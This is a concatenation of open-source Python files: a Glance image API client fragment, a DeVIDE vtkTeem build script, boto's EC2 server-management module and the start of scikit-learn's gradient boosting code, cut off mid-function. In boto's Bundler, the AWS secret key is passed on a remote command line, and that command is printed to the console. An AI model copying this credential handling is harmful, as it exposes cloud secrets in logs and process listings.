headers.update(self._image_meta_to_headers(params))
if data is not None:
return self._update_with_data(image_id, headers, data)
url = 'v1/images/%s' % image_id
resp, body = self.put(url, data, headers)
self.expected_success(200, resp.status)
body = json.loads(body)
return service_client.ResponseBody(resp, body['image'])
def delete_image(self, image_id):
url = 'v1/images/%s' % image_id
resp, body = self.delete(url)
self.expected_success(200, resp.status)
return service_client.ResponseBody(resp, body)
def list_images(self, detail=False, properties=dict(),
changes_since=None, **kwargs):
url = 'v1/images'
if detail:
url += '/detail'
params = {}
for key, value in properties.items():
params['property-%s' % key] = value
kwargs.update(params)
if changes_since is not None:
kwargs['changes-since'] = changes_since
if len(kwargs) > 0:
url += '?%s' % urllib.urlencode(kwargs)
resp, body = self.get(url)
self.expected_success(200, resp.status)
body = json.loads(body)
return service_client.ResponseBodyList(resp, body['images'])
def get_image_meta(self, image_id):
url = 'v1/images/%s' % image_id
resp, __ = self.head(url)
self.expected_success(200, resp.status)
body = self._image_meta_from_headers(resp)
return service_client.ResponseBody(resp, body)
def show_image(self, image_id):
url = 'v1/images/%s' % image_id
resp, body = self.get(url)
self.expected_success(200, resp.status)
return service_client.ResponseBodyData(resp, body)
def is_resource_deleted(self, id):
try:
self.get_image_meta(id)
except lib_exc.NotFound:
return True
return False
@property
def resource_type(self):
"""Returns the primary type of resource this client works with."""
return 'image_meta'
def list_image_members(self, image_id):
url = 'v1/images/%s/members' % image_id
resp, body = self.get(url)
self.expected_success(200, resp.status)
body = json.loads(body)
return service_client.ResponseBody(resp, body)
def list_shared_images(self, tenant_id):
"""List shared images with the specified tenant"""
url = 'v1/shared-images/%s' % tenant_id
resp, body = self.get(url)
self.expected_success(200, resp.status)
body = json.loads(body)
return service_client.ResponseBody(resp, body)
def add_member(self, member_id, image_id, can_share=False):
url = 'v1/images/%s/members/%s' % (image_id, member_id)
body = None
if can_share:
body = json.dumps({'member': {'can_share': True}})
resp, __ = self.put(url, body)
self.expected_success(204, resp.status)
return service_client.ResponseBody(resp)
def delete_member(self, member_id, image_id):
url = 'v1/images/%s/members/%s' % (image_id, member_id)
resp, __ = self.delete(url)
self.expected_success(204, resp.status)
return service_client.ResponseBody(resp)
# NOTE(afazekas): just for the wait function
def _get_image_status(self, image_id):
meta = self.get_image_meta(image_id)
status = meta['status']
return status
# NOTE(afazkas): Wait reinvented again. It is not in the correct layer
def wait_for_image_status(self, image_id, status):
"""Waits for a Image to reach a given status."""
start_time = time.time()
old_value = value = self._get_image_status(image_id)
while True:
dtime = time.time() - start_time
time.sleep(self.build_interval)
if value != old_value:
LOG.info('Value transition from "%s" to "%s"'
'in %d second(s).', old_value,
value, dtime)
if value == status:
return value
if value == 'killed':
raise exceptions.ImageKilledException(image_id=image_id,
status=status)
if dtime > self.build_timeout:
message = ('Time Limit Exceeded! (%ds)'
'while waiting for %s, '
'but we got %s.' %
(self.build_timeout, status, value))
caller = misc_utils.find_test_caller()
if caller:
message = '(%s) %s' % (caller, message)
raise exceptions.TimeoutException(message)
time.sleep(self.build_interval)
old_value = value
value = self._get_image_status(image_id)
|
fvpolpeta/devide.johannes | refs/heads/master | install_packages/ip_vtkteem.py | 5 | # Copyright (c) Francois Malan & Christian Kehl, TU Delft.
# All rights reserved.
# See COPYRIGHT for details.
import config
from install_package import InstallPackage
import os
import shutil
import utils
import sys
from subprocess import call
REVISION_NUMBER = "8877"
BASENAME = "vtkTeem"
SVN_REPO = "http://svn.slicer.org/Slicer3/trunk/Libs/vtkTeem"
dependencies = ['CMake', 'VTK58', 'Teem']
# this patch makes the necessary changes that enables building vtkTeem.
# These changes are explained in: http://code.google.com/p/devide/wiki/AddingVTKTeem
# This mainly involves replacing the default TCL wrappings with Python wrappings
TCL_PY_PATCH = "vtkteem_cmakelists_python_instead_of_tcl.diff"
class vtkTeem(InstallPackage):
def __init__(self):
self.source_dir = os.path.join(config.archive_dir, '%s' %
(BASENAME,))
self.build_dir = os.path.join(config.build_dir, '%s' %
(BASENAME,))
self.inst_dir = os.path.join(config.inst_dir, BASENAME)
self.tcl_py_patch_src = os.path.join(config.patches_dir, TCL_PY_PATCH)
self.tcl_py_patch_dst = os.path.join(self.source_dir, TCL_PY_PATCH)
def get(self):
if os.path.exists(self.source_dir):
utils.output("%s already checked out, skipping step." % BASENAME)
else:
os.chdir(config.archive_dir)
ret = call("%s co %s -r %s %s" % \
(config.SVN, SVN_REPO, REVISION_NUMBER, BASENAME), shell=True)
if ret != 0:
utils.error("Could not SVN checkout. Fix and try again.")
return
if not os.path.exists(self.tcl_py_patch_dst):
utils.output("Applying TCL -> Python patch")
# we do this copy so we can see if the patch has been done yet or not
shutil.copyfile(self.tcl_py_patch_src, self.tcl_py_patch_dst)
os.chdir(self.source_dir)
ret = os.system(
"%s < %s" % (config.PATCH, TCL_PY_PATCH))
if ret != 0:
utils.error(
"Could not apply TCL -> Python patch. Fix and try again.")
def unpack(self):
# no unpack step
pass
def configure(self):
if os.path.exists(
os.path.join(self.build_dir, 'CMakeFiles/cmake.check_cache')):
utils.output("vtkTeem build already configured.")
return
if not os.path.exists(self.build_dir):
os.mkdir(self.build_dir)
cmake_params = "-DCMAKE_BUILD_TYPE=RelWithDebInfo " \
"-DCMAKE_INSTALL_PREFIX=%s " \
"-DVTK_DIR=%s " \
"-DTeem_DIR=%s " \
% \
(self.inst_dir,config.VTK_DIR,config.Teem_DIR)
ret = utils.cmake_command(self.build_dir, self.source_dir,
cmake_params)
if ret != 0:
utils.error(
"Could not configure vtkTeem. Fix and try again.")
def build(self):
nt_file = os.path.join(self.build_dir,
'vtkTeemInit.cxx')
if utils.file_exists(nt_file, nt_file):
utils.output("vtkTeem already built. Skipping build step.")
else:
os.chdir(self.build_dir)
ret = utils.make_command('vtkTeem.sln')
if ret != 0:
utils.error("Could not build vtkTeem. Fix and try againn.")
def install(self):
if os.path.exists(
os.path.join(self.inst_dir, 'bin',
'vtkTeem' + config.PYE_EXT)):
utils.output("vtkTeem already installed. Skipping step.")
else:
os.chdir(self.build_dir)
ret = utils.make_command('vtkTeem.sln', install=True)
if ret != 0:
utils.error(
"Could not install vtkTeem. Fix and try again.")
else:
#There is a problem that the .dll is actually a .pyd but not recognized as such by DeVIDE. Rename.
if sys.platform == 'win32':
old_name = os.path.join(self.inst_dir, 'bin',
'vtkTeem' + config.SO_EXT)
new_name = os.path.join(self.inst_dir, 'bin',
'vtkTeem' + config.PYE_EXT)
if os.path.isfile(old_name) and (old_name != new_name):
utils.output("Renaming %s%s library to %s%s" % (BASENAME, config.SO_EXT, BASENAME, config.PYE_EXT))
os.rename(old_name, new_name)
def clean_build(self):
# nuke the build dir and install dir. The source dir is pristine
utils.output("Removing build dir.")
if os.path.exists(self.build_dir):
shutil.rmtree(self.build_dir)
utils.output("Removing install dir.")
if os.path.exists(self.inst_dir):
shutil.rmtree(self.inst_dir)
def get_installed_version(self):
return "revision %s" % REVISION_NUMBER
|
yoer/hue | refs/heads/master | desktop/core/ext-py/boto-2.38.0/boto/manage/server.py | 153 | # Copyright (c) 2006-2009 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010 Chris Moyer http://coredumped.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
High-level abstraction of an EC2 server
"""
import boto.ec2
from boto.mashups.iobject import IObject
from boto.pyami.config import BotoConfigPath, Config
from boto.sdb.db.model import Model
from boto.sdb.db.property import StringProperty, IntegerProperty, BooleanProperty, CalculatedProperty
from boto.manage import propget
from boto.ec2.zone import Zone
from boto.ec2.keypair import KeyPair
import os, time
from contextlib import closing
from boto.exception import EC2ResponseError
from boto.compat import six, StringIO
InstanceTypes = ['m1.small', 'm1.large', 'm1.xlarge',
'c1.medium', 'c1.xlarge',
'm2.2xlarge', 'm2.4xlarge']
class Bundler(object):
def __init__(self, server, uname='root'):
from boto.manage.cmdshell import SSHClient
self.server = server
self.uname = uname
self.ssh_client = SSHClient(server, uname=uname)
def copy_x509(self, key_file, cert_file):
print('\tcopying cert and pk over to /mnt directory on server')
self.ssh_client.open_sftp()
path, name = os.path.split(key_file)
self.remote_key_file = '/mnt/%s' % name
self.ssh_client.put_file(key_file, self.remote_key_file)
path, name = os.path.split(cert_file)
self.remote_cert_file = '/mnt/%s' % name
self.ssh_client.put_file(cert_file, self.remote_cert_file)
print('...complete!')
def bundle_image(self, prefix, size, ssh_key):
command = ""
if self.uname != 'root':
command = "sudo "
command += 'ec2-bundle-vol '
command += '-c %s -k %s ' % (self.remote_cert_file, self.remote_key_file)
command += '-u %s ' % self.server._reservation.owner_id
command += '-p %s ' % prefix
command += '-s %d ' % size
command += '-d /mnt '
if self.server.instance_type == 'm1.small' or self.server.instance_type == 'c1.medium':
command += '-r i386'
else:
command += '-r x86_64'
return command
def upload_bundle(self, bucket, prefix, ssh_key):
command = ""
if self.uname != 'root':
command = "sudo "
command += 'ec2-upload-bundle '
command += '-m /mnt/%s.manifest.xml ' % prefix
command += '-b %s ' % bucket
command += '-a %s ' % self.server.ec2.aws_access_key_id
command += '-s %s ' % self.server.ec2.aws_secret_access_key
return command
def bundle(self, bucket=None, prefix=None, key_file=None, cert_file=None,
size=None, ssh_key=None, fp=None, clear_history=True):
iobject = IObject()
if not bucket:
bucket = iobject.get_string('Name of S3 bucket')
if not prefix:
prefix = iobject.get_string('Prefix for AMI file')
if not key_file:
key_file = iobject.get_filename('Path to RSA private key file')
if not cert_file:
cert_file = iobject.get_filename('Path to RSA public cert file')
if not size:
size = iobject.get_int('Size (in MB) of bundled image')
if not ssh_key:
ssh_key = self.server.get_ssh_key_file()
self.copy_x509(key_file, cert_file)
if not fp:
fp = StringIO()
fp.write('sudo mv %s /mnt/boto.cfg; ' % BotoConfigPath)
fp.write('mv ~/.ssh/authorized_keys /mnt/authorized_keys; ')
if clear_history:
fp.write('history -c; ')
fp.write(self.bundle_image(prefix, size, ssh_key))
fp.write('; ')
fp.write(self.upload_bundle(bucket, prefix, ssh_key))
fp.write('; ')
fp.write('sudo mv /mnt/boto.cfg %s; ' % BotoConfigPath)
fp.write('mv /mnt/authorized_keys ~/.ssh/authorized_keys')
command = fp.getvalue()
print('running the following command on the remote server:')
print(command)
t = self.ssh_client.run(command)
print('\t%s' % t[0])
print('\t%s' % t[1])
print('...complete!')
print('registering image...')
self.image_id = self.server.ec2.register_image(name=prefix, image_location='%s/%s.manifest.xml' % (bucket, prefix))
return self.image_id
class CommandLineGetter(object):
def get_ami_list(self):
my_amis = []
for ami in self.ec2.get_all_images():
# hack alert, need a better way to do this!
if ami.location.find('pyami') >= 0:
my_amis.append((ami.location, ami))
return my_amis
def get_region(self, params):
region = params.get('region', None)
if isinstance(region, basestring):
region = boto.ec2.get_region(region)
params['region'] = region
if not region:
prop = self.cls.find_property('region_name')
params['region'] = propget.get(prop, choices=boto.ec2.regions)
self.ec2 = params['region'].connect()
def get_name(self, params):
if not params.get('name', None):
prop = self.cls.find_property('name')
params['name'] = propget.get(prop)
def get_description(self, params):
if not params.get('description', None):
prop = self.cls.find_property('description')
params['description'] = propget.get(prop)
def get_instance_type(self, params):
if not params.get('instance_type', None):
prop = StringProperty(name='instance_type', verbose_name='Instance Type',
choices=InstanceTypes)
params['instance_type'] = propget.get(prop)
def get_quantity(self, params):
if not params.get('quantity', None):
prop = IntegerProperty(name='quantity', verbose_name='Number of Instances')
params['quantity'] = propget.get(prop)
def get_zone(self, params):
if not params.get('zone', None):
prop = StringProperty(name='zone', verbose_name='EC2 Availability Zone',
choices=self.ec2.get_all_zones)
params['zone'] = propget.get(prop)
def get_ami_id(self, params):
valid = False
while not valid:
ami = params.get('ami', None)
if not ami:
prop = StringProperty(name='ami', verbose_name='AMI')
ami = propget.get(prop)
try:
rs = self.ec2.get_all_images([ami])
if len(rs) == 1:
valid = True
params['ami'] = rs[0]
except EC2ResponseError:
pass
def get_group(self, params):
group = params.get('group', None)
if isinstance(group, basestring):
group_list = self.ec2.get_all_security_groups()
for g in group_list:
if g.name == group:
group = g
params['group'] = g
if not group:
prop = StringProperty(name='group', verbose_name='EC2 Security Group',
choices=self.ec2.get_all_security_groups)
params['group'] = propget.get(prop)
def get_key(self, params):
keypair = params.get('keypair', None)
if isinstance(keypair, basestring):
key_list = self.ec2.get_all_key_pairs()
for k in key_list:
if k.name == keypair:
keypair = k.name
params['keypair'] = k.name
if not keypair:
prop = StringProperty(name='keypair', verbose_name='EC2 KeyPair',
choices=self.ec2.get_all_key_pairs)
params['keypair'] = propget.get(prop).name
def get(self, cls, params):
self.cls = cls
self.get_region(params)
self.ec2 = params['region'].connect()
self.get_name(params)
self.get_description(params)
self.get_instance_type(params)
self.get_zone(params)
self.get_quantity(params)
self.get_ami_id(params)
self.get_group(params)
self.get_key(params)
class Server(Model):
#
# The properties of this object consists of real properties for data that
# is not already stored in EC2 somewhere (e.g. name, description) plus
# calculated properties for all of the properties that are already in
# EC2 (e.g. hostname, security groups, etc.)
#
name = StringProperty(unique=True, verbose_name="Name")
description = StringProperty(verbose_name="Description")
region_name = StringProperty(verbose_name="EC2 Region Name")
instance_id = StringProperty(verbose_name="EC2 Instance ID")
elastic_ip = StringProperty(verbose_name="EC2 Elastic IP Address")
production = BooleanProperty(verbose_name="Is This Server Production", default=False)
ami_id = CalculatedProperty(verbose_name="AMI ID", calculated_type=str, use_method=True)
zone = CalculatedProperty(verbose_name="Availability Zone Name", calculated_type=str, use_method=True)
hostname = CalculatedProperty(verbose_name="Public DNS Name", calculated_type=str, use_method=True)
private_hostname = CalculatedProperty(verbose_name="Private DNS Name", calculated_type=str, use_method=True)
groups = CalculatedProperty(verbose_name="Security Groups", calculated_type=list, use_method=True)
security_group = CalculatedProperty(verbose_name="Primary Security Group Name", calculated_type=str, use_method=True)
key_name = CalculatedProperty(verbose_name="Key Name", calculated_type=str, use_method=True)
instance_type = CalculatedProperty(verbose_name="Instance Type", calculated_type=str, use_method=True)
status = CalculatedProperty(verbose_name="Current Status", calculated_type=str, use_method=True)
launch_time = CalculatedProperty(verbose_name="Server Launch Time", calculated_type=str, use_method=True)
console_output = CalculatedProperty(verbose_name="Console Output", calculated_type=open, use_method=True)
packages = []
plugins = []
@classmethod
def add_credentials(cls, cfg, aws_access_key_id, aws_secret_access_key):
if not cfg.has_section('Credentials'):
cfg.add_section('Credentials')
cfg.set('Credentials', 'aws_access_key_id', aws_access_key_id)
cfg.set('Credentials', 'aws_secret_access_key', aws_secret_access_key)
if not cfg.has_section('DB_Server'):
cfg.add_section('DB_Server')
cfg.set('DB_Server', 'db_type', 'SimpleDB')
cfg.set('DB_Server', 'db_name', cls._manager.domain.name)
@classmethod
def create(cls, config_file=None, logical_volume = None, cfg = None, **params):
"""
Create a new instance based on the specified configuration file or the specified
configuration and the passed in parameters.
If the config_file argument is not None, the configuration is read from there.
Otherwise, the cfg argument is used.
The config file may include other config files with a #import reference. The included
config files must reside in the same directory as the specified file.
The logical_volume argument, if supplied, will be used to get the current physical
volume ID and use that as an override of the value specified in the config file. This
may be useful for debugging purposes when you want to debug with a production config
file but a test Volume.
The dictionary argument may be used to override any EC2 configuration values in the
config file.
"""
if config_file:
cfg = Config(path=config_file)
if cfg.has_section('EC2'):
# include any EC2 configuration values that aren't specified in params:
for option in cfg.options('EC2'):
if option not in params:
params[option] = cfg.get('EC2', option)
getter = CommandLineGetter()
getter.get(cls, params)
region = params.get('region')
ec2 = region.connect()
cls.add_credentials(cfg, ec2.aws_access_key_id, ec2.aws_secret_access_key)
ami = params.get('ami')
kp = params.get('keypair')
group = params.get('group')
zone = params.get('zone')
# deal with possibly passed in logical volume:
if logical_volume != None:
cfg.set('EBS', 'logical_volume_name', logical_volume.name)
cfg_fp = StringIO()
cfg.write(cfg_fp)
# deal with the possibility that zone and/or keypair are strings read from the config file:
if isinstance(zone, Zone):
zone = zone.name
if isinstance(kp, KeyPair):
kp = kp.name
reservation = ami.run(min_count=1,
max_count=params.get('quantity', 1),
key_name=kp,
security_groups=[group],
instance_type=params.get('instance_type'),
placement = zone,
user_data = cfg_fp.getvalue())
l = []
i = 0
elastic_ip = params.get('elastic_ip')
instances = reservation.instances
if elastic_ip is not None and instances.__len__() > 0:
instance = instances[0]
print('Waiting for instance to start so we can set its elastic IP address...')
# Sometimes we get a message from ec2 that says that the instance does not exist.
# Hopefully the following delay will giv eec2 enough time to get to a stable state:
time.sleep(5)
while instance.update() != 'running':
time.sleep(1)
instance.use_ip(elastic_ip)
print('set the elastic IP of the first instance to %s' % elastic_ip)
for instance in instances:
s = cls()
s.ec2 = ec2
s.name = params.get('name') + '' if i==0 else str(i)
s.description = params.get('description')
s.region_name = region.name
s.instance_id = instance.id
if elastic_ip and i == 0:
s.elastic_ip = elastic_ip
s.put()
l.append(s)
i += 1
return l
@classmethod
def create_from_instance_id(cls, instance_id, name, description=''):
regions = boto.ec2.regions()
for region in regions:
ec2 = region.connect()
try:
rs = ec2.get_all_reservations([instance_id])
except:
rs = []
if len(rs) == 1:
s = cls()
s.ec2 = ec2
s.name = name
s.description = description
s.region_name = region.name
s.instance_id = instance_id
s._reservation = rs[0]
for instance in s._reservation.instances:
if instance.id == instance_id:
s._instance = instance
s.put()
return s
return None
@classmethod
def create_from_current_instances(cls):
servers = []
regions = boto.ec2.regions()
for region in regions:
ec2 = region.connect()
rs = ec2.get_all_reservations()
for reservation in rs:
for instance in reservation.instances:
try:
next(Server.find(instance_id=instance.id))
boto.log.info('Server for %s already exists' % instance.id)
except StopIteration:
s = cls()
s.ec2 = ec2
s.name = instance.id
s.region_name = region.name
s.instance_id = instance.id
s._reservation = reservation
s.put()
servers.append(s)
return servers
def __init__(self, id=None, **kw):
super(Server, self).__init__(id, **kw)
self.ssh_key_file = None
self.ec2 = None
self._cmdshell = None
self._reservation = None
self._instance = None
self._setup_ec2()
def _setup_ec2(self):
if self.ec2 and self._instance and self._reservation:
return
if self.id:
if self.region_name:
for region in boto.ec2.regions():
if region.name == self.region_name:
self.ec2 = region.connect()
if self.instance_id and not self._instance:
try:
rs = self.ec2.get_all_reservations([self.instance_id])
if len(rs) >= 1:
for instance in rs[0].instances:
if instance.id == self.instance_id:
self._reservation = rs[0]
self._instance = instance
except EC2ResponseError:
pass
def _status(self):
status = ''
if self._instance:
self._instance.update()
status = self._instance.state
return status
def _hostname(self):
hostname = ''
if self._instance:
hostname = self._instance.public_dns_name
return hostname
def _private_hostname(self):
hostname = ''
if self._instance:
hostname = self._instance.private_dns_name
return hostname
def _instance_type(self):
it = ''
if self._instance:
it = self._instance.instance_type
return it
def _launch_time(self):
lt = ''
if self._instance:
lt = self._instance.launch_time
return lt
def _console_output(self):
co = ''
if self._instance:
co = self._instance.get_console_output()
return co
def _groups(self):
gn = []
if self._reservation:
gn = self._reservation.groups
return gn
def _security_group(self):
groups = self._groups()
if len(groups) >= 1:
return groups[0].id
return ""
def _zone(self):
zone = None
if self._instance:
zone = self._instance.placement
return zone
def _key_name(self):
kn = None
if self._instance:
kn = self._instance.key_name
return kn
def put(self):
super(Server, self).put()
self._setup_ec2()
def delete(self):
if self.production:
raise ValueError("Can't delete a production server")
#self.stop()
super(Server, self).delete()
def stop(self):
if self.production:
raise ValueError("Can't delete a production server")
if self._instance:
self._instance.stop()
def terminate(self):
if self.production:
raise ValueError("Can't delete a production server")
if self._instance:
self._instance.terminate()
def reboot(self):
if self._instance:
self._instance.reboot()
def wait(self):
while self.status != 'running':
time.sleep(5)
def get_ssh_key_file(self):
if not self.ssh_key_file:
ssh_dir = os.path.expanduser('~/.ssh')
if os.path.isdir(ssh_dir):
ssh_file = os.path.join(ssh_dir, '%s.pem' % self.key_name)
if os.path.isfile(ssh_file):
self.ssh_key_file = ssh_file
if not self.ssh_key_file:
iobject = IObject()
self.ssh_key_file = iobject.get_filename('Path to OpenSSH Key file')
return self.ssh_key_file
def get_cmdshell(self):
if not self._cmdshell:
from boto.manage import cmdshell
self.get_ssh_key_file()
self._cmdshell = cmdshell.start(self)
return self._cmdshell
def reset_cmdshell(self):
self._cmdshell = None
def run(self, command):
with closing(self.get_cmdshell()) as cmd:
status = cmd.run(command)
return status
def get_bundler(self, uname='root'):
self.get_ssh_key_file()
return Bundler(self, uname)
def get_ssh_client(self, uname='root', ssh_pwd=None):
from boto.manage.cmdshell import SSHClient
self.get_ssh_key_file()
return SSHClient(self, uname=uname, ssh_pwd=ssh_pwd)
def install(self, pkg):
return self.run('apt-get -y install %s' % pkg)
|
schets/scikit-learn | refs/heads/master | sklearn/ensemble/gradient_boosting.py | 6 | """Gradient Boosted Regression Trees
This module contains methods for fitting gradient boosted regression trees for
both classification and regression.
The module structure is the following:
- The ``BaseGradientBoosting`` base class implements a common ``fit`` method
for all the estimators in the module. Regression and classification
only differ in the concrete ``LossFunction`` used.
- ``GradientBoostingClassifier`` implements gradient boosting for
classification problems.
- ``GradientBoostingRegressor`` implements gradient boosting for
regression problems.
"""
# Authors: Peter Prettenhofer, Scott White, Gilles Louppe, Emanuele Olivetti,
# Arnaud Joly
# License: BSD 3 clause
from __future__ import print_function
from __future__ import division
from abc import ABCMeta, abstractmethod
from time import time
import numbers
import numpy as np
from scipy import stats
from .base import BaseEnsemble
from ..base import BaseEstimator
from ..base import ClassifierMixin
from ..base import RegressorMixin
from ..utils import check_random_state, check_array, check_X_y, column_or_1d
from ..utils import check_consistent_length, deprecated
from ..utils.extmath import logsumexp
from ..utils.fixes import expit, bincount
from ..utils.stats import _weighted_percentile
from ..utils.validation import check_is_fitted, NotFittedError
from ..externals import six
from ..feature_selection.from_model import _LearntSelectorMixin
from ..tree.tree import DecisionTreeRegressor
from ..tree._tree import DTYPE, TREE_LEAF
from ..tree._tree import PresortBestSplitter
from ..tree._tree import FriedmanMSE
from ._gradient_boosting import predict_stages
from ._gradient_boosting import predict_stage
from ._gradient_boosting import _random_sample_mask
class QuantileEstimator(BaseEstimator):
"""An estimator predicting the alpha-quantile of the training targets."""
def __init__(self, alpha=0.9):
if not 0 < alpha < 1.0:
raise ValueError("`alpha` must be in (0, 1.0) but was %r" % alpha)
self.alpha = alpha
def fit(self, X, y, sample_weight=None):
if sample_weight is None:
self.quantile = stats.scoreatpercentile(y, self.alpha * 100.0)
else:
self.quantile = _weighted_percentile(y, sample_weight, self.alpha * 100.0)
def predict(self, X):
check_is_fitted(self, 'quantile')
y = np.empty((X.shape[0], 1), dtype=np.float64)
y.fill(self.quantile)
return y
class MeanEstimator(BaseEstimator):
"""An estimator predicting the mean of the training targets."""
def fit(self, X, y, sample_weight=None):
if sample_weight is None:
self.mean = np.mean(y)
else:
self.mean = np.average(y, weights=sample_weight)
def predict(self, X):
check_is_fitted(self, 'mean')
y = np.empty((X.shape[0], 1), dtype=np.float64)
y.fill(self.mean)
return y
class LogOddsEstimator(BaseEstimator):
"""An estimator predicting the log odds ratio."""
scale = 1.0
def fit(self, X, y, sample_weight=None):
# pre-cond: pos, neg are encoded as 1, 0
if sample_weight is None:
pos = np.sum(y)
neg = y.shape[0] - pos
else:
pos = np.sum(sample_weight * y)
neg = np.sum(sample_weight * (1 - y))
if neg == 0 or pos == 0:
raise ValueError('y contains non binary labels.')
self.prior = self.scale * np.log(pos / neg)
def predict(self, X):
check_is_fitted(self, 'prior')
y = np.empty((X.shape[0], 1), dtype=np.float64)
y.fill(self.prior)
return y
class ScaledLogOddsEstimator(LogOddsEstimator):
"""Log odds ratio scaled by 0.5 -- for exponential loss. """
scale = 0.5
class PriorProbabilityEstimator(BaseEstimator):
"""An estimator predicting the probability of each
class in the training data.
"""
def fit(self, X, y, sample_weight=None):
if sample_weight is None:
sample_weight = np.ones_like(y, dtype=np.float64)
class_counts = bincount(y, weights=sample_weight)
self.priors = class_counts / class_counts.sum()
def predict(self, X):
check_is_fitted(self, 'priors')
y = np.empty((X.shape[0], self.priors.shape[0]), dtype=np.float64)
y[:] = self.priors
return y
class ZeroEstimator(BaseEstimator):
"""An estimator that simply predicts zero. """
def fit(self, X, y, sample_weight=None):
if np.issubdtype(y.dtype, int):
# classification
self.n_classes = np.unique(y).shape[0]
if self.n_classes == 2:
self.n_classes = 1
else:
# regression
self.n_classes = 1
def predict(self, X):
check_is_fitted(self, 'n_classes')
y = np.empty((X.shape[0], self.n_classes), dtype=np.float64)
y.fill(0.0)
return y
class LossFunction(six.with_metaclass(ABCMeta, object)):
"""Abstract base class for various loss functions.
Attributes
----------
K : int
The number of regression trees to be induced;
1 for regression and binary classification;
``n_classes`` for multi-class classification.
"""
is_multi_class = False
def __init__(self, n_classes):
self.K = n_classes
def init_estimator(self):
"""Default ``init`` estimator for loss function. """
raise NotImplementedError()
@abstractmethod
def __call__(self, y, pred, sample_weight=None):
"""Compute the loss of prediction ``pred`` and ``y``. """
@abstractmethod
def negative_gradient(self, y, y_pred, **kargs):
"""Compute the negative gradient.
Parameters
---------
y : np.ndarray, shape=(n,)
The target labels.
y_pred : np.ndarray, shape=(n,):
The predictions.
"""
def update_terminal_regions(self, tree, X, y, residual, y_pred,
sample_weight, sample_mask,
learning_rate=1.0, k=0):
"""Update the terminal regions (=leaves) of the given tree and
updates the current predictions of the model. Traverses tree
and invokes template method `_update_terminal_region`.
Parameters
----------
tree : tree.Tree
The tree object.
X : ndarray, shape=(n, m)
The data array.
y : ndarray, shape=(n,)
The target labels.
residual : ndarray, shape=(n,)
The residuals (usually the negative gradient).
y_pred : ndarray, shape=(n,)
The predictions.
sample_weight : ndarray, shape=(n,)
The weight of each sample.
sample_mask : ndarray, shape=(n,)
The sample mask to be used.
learning_rate : float, default=0.1
learning rate shrinks the contribution of each tree by
``learning_rate``.
k : int, default 0
The index of the estimator being updated.
"""
# compute leaf for each sample in ``X``.
terminal_regions = tree.apply(X)
# mask all which are not in sample mask.
masked_terminal_regions = terminal_regions.copy()
masked_terminal_regions[~sample_mask] = -1
# update each leaf (= perform line search)
for leaf in np.where(tree.children_left == TREE_LEAF)[0]:
self._update_terminal_region(tree, masked_terminal_regions,
leaf, X, y, residual,
y_pred[:, k], sample_weight)
# update predictions (both in-bag and out-of-bag)
y_pred[:, k] += (learning_rate
* tree.value[:, 0, 0].take(terminal_regions, axis=0))
@abstractmethod
def _update_terminal_region(self, tree, terminal_regions, leaf, X, y,
residual, pred, sample_weight):
"""Template method for updating terminal regions (=leaves). """
class RegressionLossFunction(six.with_metaclass(ABCMeta, LossFunction)):
"""Base class for regression loss functions. """
def __init__(self, n_classes):
if n_classes != 1:
raise ValueError("``n_classes`` must be 1 for regression but "
"was %r" % n_classes)
super(RegressionLossFunction, self).__init__(n_classes)
class LeastSquaresError(RegressionLossFunction):
"""Loss function for least squares (LS) estimation.
Terminal regions need not to be updated for least squares. """
def init_estimator(self):
return MeanEstimator()
def __call__(self, y, pred, sample_weight=None):
if sample_weight is None:
return np.mean((y - pred.ravel()) ** 2.0)
else:
return (1.0 / sample_weight.sum() *
np.sum(sample_weight * ((y - pred.ravel()) ** 2.0)))
def negative_gradient(self, y, pred, **kargs):
return y - pred.ravel()
def update_terminal_regions(self, tree, X, y, residual, y_pred,
sample_weight, sample_mask,
learning_rate=1.0, k=0):
"""Least squares does not need to update terminal regions.
But it has to update the predictions.
"""
# update predictions
y_pred[:, k] += learning_rate * tree.predict(X).ravel()
def _update_terminal_region(self, tree, terminal_regions, leaf, X, y,
residual, pred, sample_weight):
pass
class LeastAbsoluteError(RegressionLossFunction):
"""Loss function for least absolute deviation (LAD) regression. """
def init_estimator(self):
return QuantileEstimator(alpha=0.5)
def __call__(self, y, pred, sample_weight=None):
if sample_weight is None:
return np.abs(y - pred.ravel()).mean()
else:
return (1.0 / sample_weight.sum() *
np.sum(sample_weight * np.abs(y - pred.ravel())))
def negative_gradient(self, y, pred, **kargs):
"""1.0 if y - pred > 0.0 else -1.0"""
pred = pred.ravel()
return 2.0 * (y - pred > 0.0) - 1.0
def _update_terminal_region(self, tree, terminal_regions, leaf, X, y,
residual, pred, sample_weight):
"""LAD updates terminal regions to median estimates. """
terminal_region = np.where(terminal_regions == leaf)[0]
sample_weight = sample_weight.take(terminal_region, axis=0)
diff = y.take(terminal_region, axis=0) - pred.take(terminal_region, axis=0)
tree.value[leaf, 0, 0] = _weighted_percentile(diff, sample_weight, percentile=50)
class HuberLossFunction(RegressionLossFunction):
"""Huber loss function for robust regression.
M-Regression proposed in Friedman 2001.
References
----------
J. Friedman, Greedy Function Approximation: A Gradient Boosting
Machine, The Annals of Statistics, Vol. 29, No. 5, 2001.
"""
def __init__(self, n_classes, alpha=0.9):
super(HuberLossFunction, self).__init__(n_classes)
self.alpha = alpha
self.gamma = None
def init_estimator(self):
return QuantileEstimator(alpha=0.5)
def __call__(self, y, pred, sample_weight=None):
pred = pred.ravel()
diff = y - pred
gamma = self.gamma
if gamma is None:
if sample_weight is None:
gamma = stats.scoreatpercentile(np.abs(diff), self.alpha * 100)
else:
